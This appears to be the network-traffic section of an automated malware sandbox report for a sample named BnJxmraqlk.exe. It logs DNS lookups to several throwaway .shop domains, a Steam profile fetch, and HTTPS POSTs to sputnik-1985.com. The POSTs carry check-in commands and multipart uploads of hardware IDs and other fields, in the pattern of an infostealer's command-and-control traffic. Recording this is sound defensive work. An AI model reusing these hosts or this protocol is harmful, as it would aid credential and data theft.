                                                                                                                                                                                                                          Jan 7, 2025 13:17:10.767194986 CET49722443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:10.767278910 CET49722443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:10.767297029 CET44349722104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:10.982263088 CET49758443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:10.982306004 CET44349758104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:10.982389927 CET49758443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:10.982660055 CET49758443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:10.982671976 CET44349758104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:11.453330994 CET44349758104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:11.453443050 CET49758443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:11.454731941 CET49758443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:11.454745054 CET44349758104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:11.454953909 CET44349758104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:11.456156969 CET49758443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:11.456311941 CET49758443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:11.456346989 CET44349758104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:11.456404924 CET49758443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:11.499345064 CET44349758104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:11.969741106 CET44349758104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:11.969829082 CET44349758104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:11.969882011 CET49758443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:11.989818096 CET49758443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:11.989845991 CET44349758104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:12.254936934 CET49767443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:12.254966021 CET44349767104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:12.255027056 CET49767443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:12.255280018 CET49767443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:12.255292892 CET44349767104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:12.720985889 CET44349767104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:12.721069098 CET49767443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:12.722349882 CET49767443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:12.722361088 CET44349767104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:12.722610950 CET44349767104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:12.723879099 CET49767443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:12.724026918 CET49767443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:12.724062920 CET44349767104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:12.724153042 CET49767443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:12.724159956 CET44349767104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:13.334852934 CET44349767104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:13.334959984 CET44349767104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:13.335015059 CET49767443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:13.335109949 CET49767443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:13.335125923 CET44349767104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:14.000931978 CET49783443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:14.000962973 CET44349783104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:14.001025915 CET49783443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:14.001333952 CET49783443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:14.001354933 CET44349783104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:14.473488092 CET44349783104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:14.473566055 CET49783443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:14.474854946 CET49783443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:14.474862099 CET44349783104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:14.475115061 CET44349783104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:14.476543903 CET49783443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:14.476624012 CET49783443192.168.2.6104.21.48.1
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Jan 7, 2025 13:17:02.065871000 CET | 192.168.2.6 | 1.1.1.1 | 0xfb0 | Standard query (0) | spottercurvei.click | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 13:17:02.077301025 CET | 192.168.2.6 | 1.1.1.1 | 0xdf85 | Standard query (0) | nearycrepso.shop | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 13:17:02.089335918 CET | 192.168.2.6 | 1.1.1.1 | 0x68f1 | Standard query (0) | abruptyopsn.shop | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 13:17:02.101883888 CET | 192.168.2.6 | 1.1.1.1 | 0x1cc7 | Standard query (0) | wholersorie.shop | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 13:17:02.114723921 CET | 192.168.2.6 | 1.1.1.1 | 0x9388 | Standard query (0) | framekgirus.shop | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 13:17:02.126174927 CET | 192.168.2.6 | 1.1.1.1 | 0xd99a | Standard query (0) | tirepublicerj.shop | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 13:17:02.138060093 CET | 192.168.2.6 | 1.1.1.1 | 0x4248 | Standard query (0) | noisycuttej.shop | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 13:17:02.146375895 CET | 192.168.2.6 | 1.1.1.1 | 0x1de7 | Standard query (0) | rabidcowse.shop | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 13:17:02.161242008 CET | 192.168.2.6 | 1.1.1.1 | 0x11fa | Standard query (0) | cloudewahsj.shop | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 13:17:02.169461966 CET | 192.168.2.6 | 1.1.1.1 | 0xcce7 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 13:17:03.472965956 CET | 192.168.2.6 | 1.1.1.1 | 0x6d05 | Standard query (0) | sputnik-1985.com | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Jan 7, 2025 13:17:02.076066971 CET | 1.1.1.1 | 192.168.2.6 | 0xfb0 | Name error (3) | spottercurvei.click | none | none | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 13:17:02.088212967 CET | 1.1.1.1 | 192.168.2.6 | 0xdf85 | Name error (3) | nearycrepso.shop | none | none | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 13:17:02.100774050 CET | 1.1.1.1 | 192.168.2.6 | 0x68f1 | Name error (3) | abruptyopsn.shop | none | none | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 13:17:02.113485098 CET | 1.1.1.1 | 192.168.2.6 | 0x1cc7 | Name error (3) | wholersorie.shop | none | none | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 13:17:02.125125885 CET | 1.1.1.1 | 192.168.2.6 | 0x9388 | Name error (3) | framekgirus.shop | none | none | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 13:17:02.136997938 CET | 1.1.1.1 | 192.168.2.6 | 0xd99a | Name error (3) | tirepublicerj.shop | none | none | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 13:17:02.145508051 CET | 1.1.1.1 | 192.168.2.6 | 0x4248 | Name error (3) | noisycuttej.shop | none | none | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 13:17:02.160202980 CET | 1.1.1.1 | 192.168.2.6 | 0x1de7 | Name error (3) | rabidcowse.shop | none | none | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 13:17:02.168483019 CET | 1.1.1.1 | 192.168.2.6 | 0x11fa | Name error (3) | cloudewahsj.shop | none | none | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 13:17:02.177026033 CET | 1.1.1.1 | 192.168.2.6 | 0xcce7 | No error (0) | steamcommunity.com | | 104.102.49.254 | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 13:17:03.505980968 CET | 1.1.1.1 | 192.168.2.6 | 0x6d05 | No error (0) | sputnik-1985.com | | 104.21.48.1 | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 13:17:03.505980968 CET | 1.1.1.1 | 192.168.2.6 | 0x6d05 | No error (0) | sputnik-1985.com | | 104.21.16.1 | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 13:17:03.505980968 CET | 1.1.1.1 | 192.168.2.6 | 0x6d05 | No error (0) | sputnik-1985.com | | 104.21.64.1 | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 13:17:03.505980968 CET | 1.1.1.1 | 192.168.2.6 | 0x6d05 | No error (0) | sputnik-1985.com | | 104.21.96.1 | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 13:17:03.505980968 CET | 1.1.1.1 | 192.168.2.6 | 0x6d05 | No error (0) | sputnik-1985.com | | 104.21.32.1 | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 13:17:03.505980968 CET | 1.1.1.1 | 192.168.2.6 | 0x6d05 | No error (0) | sputnik-1985.com | | 104.21.112.1 | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 13:17:03.505980968 CET | 1.1.1.1 | 192.168.2.6 | 0x6d05 | No error (0) | sputnik-1985.com | | 104.21.80.1 | A (IP address) | IN (0x0001) | false |
• steamcommunity.com
• sputnik-1985.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49713 | 104.102.49.254 | 443 | 612 | C:\Users\user\Desktop\BnJxmraqlk.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:17:02 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com
2025-01-07 12:17:03 UTC | 1905 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Tue, 07 Jan 2025 12:17:03 GMT
Content-Length: 35126
Connection: close
Set-Cookie: sessionid=52850c8b532753f67b1830b1; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2025-01-07 12:17:03 UTC | 14479 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2025-01-07 12:17:03 UTC | 16384 | IN | Data Raw: 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f
Data Ascii: ity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPO
2025-01-07 12:17:03 UTC | 3768 | IN | Data Raw: 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 73 6f 6e 61 5f
Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_
2025-01-07 12:17:03 UTC | 495 | IN | Data Raw: 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73
Data Ascii: criber Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div clas


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49714 | 104.21.48.1 | 443 | 612 | C:\Users\user\Desktop\BnJxmraqlk.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:17:04 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: sputnik-1985.com
2025-01-07 12:17:04 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2025-01-07 12:17:04 UTC | 1116 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 12:17:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=8mtstinu5df2gpldh5b302mf6a; expires=Sat, 03 May 2025 06:03:43 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jxXGFdFwOgIkfhZrZGTgF5BCn9IgdN31ubMmkBif4Lh72HGk4gDOq59tp7IAiKBWbWRqVlO3wiKmEb5Pv4XMdJK9NLpZh0Sln1oJRwPm1V3Z4M%2FQDUVNkUzku8bKFycRAetj"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fe3e1f09f568cda-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1963&min_rtt=1963&rtt_var=981&sent=5&recv=7&lost=0&retrans=1&sent_bytes=4218&recv_bytes=907&delivery_rate=394434&cwnd=242&unsent_bytes=0&cid=6f312a66f674e6ea&ts=341&x=0"
2025-01-07 12:17:04 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2025-01-07 12:17:04 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          2192.168.2.649716104.21.48.1443612C:\Users\user\Desktop\BnJxmraqlk.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2025-01-07 12:17:04 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Content-Length: 42
                                                                                                                                                                                                                          Host: sputnik-1985.com
                                                                                                                                                                                                                          2025-01-07 12:17:04 UTC42OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 63 51 6c 30 6d 2d 2d 26 6a 3d
                                                                                                                                                                                                                          Data Ascii: act=recive_message&ver=4.0&lid=hcQl0m--&j=
                                                                                                                                                                                                                          2025-01-07 12:17:05 UTC1117INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Tue, 07 Jan 2025 12:17:05 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=5itlf71d2031co2sq1ofosplg5; expires=Sat, 03 May 2025 06:03:44 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lb%2FIfk9TLNPFYt3n2jKym5r4UwPKiqTIZqStsFZ89ZjYiEqD3HrnL3U1PUsiR8E19vosXUhJDUtMwwAhD9ZhS4P95lQAF2ob9FKM2Ag4txqo7hg7bTsqdTiIjpE9gRmB1QEW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8fe3e1f5efe48c15-EWR
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1813&min_rtt=1801&rtt_var=701&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=942&delivery_rate=1534419&cwnd=238&unsent_bytes=0&cid=d412294e2e715a6c&ts=478&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49722 | 104.21.48.1 | 443 | 612 | C:\Users\user\Desktop\BnJxmraqlk.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:17:06 UTC | 278 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=WW7R38ADA900WJ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12830
Host: sputnik-1985.com
2025-01-07 12:17:06 UTC | 12830 | OUT | Data Ascii (line breaks restored from the CR/LF bytes of the raw dump; the capture is truncated):
--WW7R38ADA900WJ
Content-Disposition: form-data; name="hwid"

639F9CFCAF29E24A822D1F4978021086
--WW7R38ADA900WJ
Content-Disposition: form-data; name="pid"

2
--WW7R38ADA900WJ
Content-Disposition: form-data; name="lid"

hcQl0m--
--WW7R38ADA900W
2025-01-07 12:17:10 UTC | 1129 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 12:17:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=jdu7s95titm5qj4q1krgm380ph; expires=Sat, 03 May 2025 06:03:45 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HAH5H10yK0aYiHfHdwIpUHX%2BIqC4KW4CDT4%2Ff6bsflRRKOd8elYCtSbJ5JxlmjyESODhNphPcagDX0ikBR6pvokz82%2BbzjP8InPMzSVo8iFveF5lXlmic6jF890%2B%2BrBMPRG3"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fe3e1fd89d3c323-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1442&min_rtt=1431&rtt_var=558&sent=8&recv=16&lost=0&retrans=0&sent_bytes=2840&recv_bytes=13766&delivery_rate=1922317&cwnd=214&unsent_bytes=0&cid=65f2f46eb2601300&ts=4691&x=0"
2025-01-07 12:17:10 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-07 12:17:10 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49758 | 104.21.48.1 | 443 | 612 | C:\Users\user\Desktop\BnJxmraqlk.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:17:11 UTC | 273 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=OOG2NDWT1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15046
Host: sputnik-1985.com
2025-01-07 12:17:11 UTC | 15046 | OUT | Data Ascii (line breaks restored from the CR/LF bytes of the raw dump; the capture is truncated):
--OOG2NDWT1
Content-Disposition: form-data; name="hwid"

639F9CFCAF29E24A822D1F4978021086
--OOG2NDWT1
Content-Disposition: form-data; name="pid"

2
--OOG2NDWT1
Content-Disposition: form-data; name="lid"

hcQl0m--
--OOG2NDWT1
Content-Dispositi
2025-01-07 12:17:11 UTC | 1124 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 12:17:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=28qvj86b2a8dg68p03h49o61rh; expires=Sat, 03 May 2025 06:03:50 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HfTudMjBGSSw87uDVaHnVMecHR1jc0nUw0zH8NS787jl8%2FIvB1ZkeAyQWkwoDV5Tob%2B6w0N%2FlznaSEvgdRmmHwyeYnAHAgAs0njIhcOw8KShAsoDVXB4ucM6dUUBxEItSbah"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fe3e21eeb4cc461-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1534&min_rtt=1517&rtt_var=603&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2841&recv_bytes=15977&delivery_rate=1763285&cwnd=228&unsent_bytes=0&cid=c4d71bf16794cc42&ts=532&x=0"
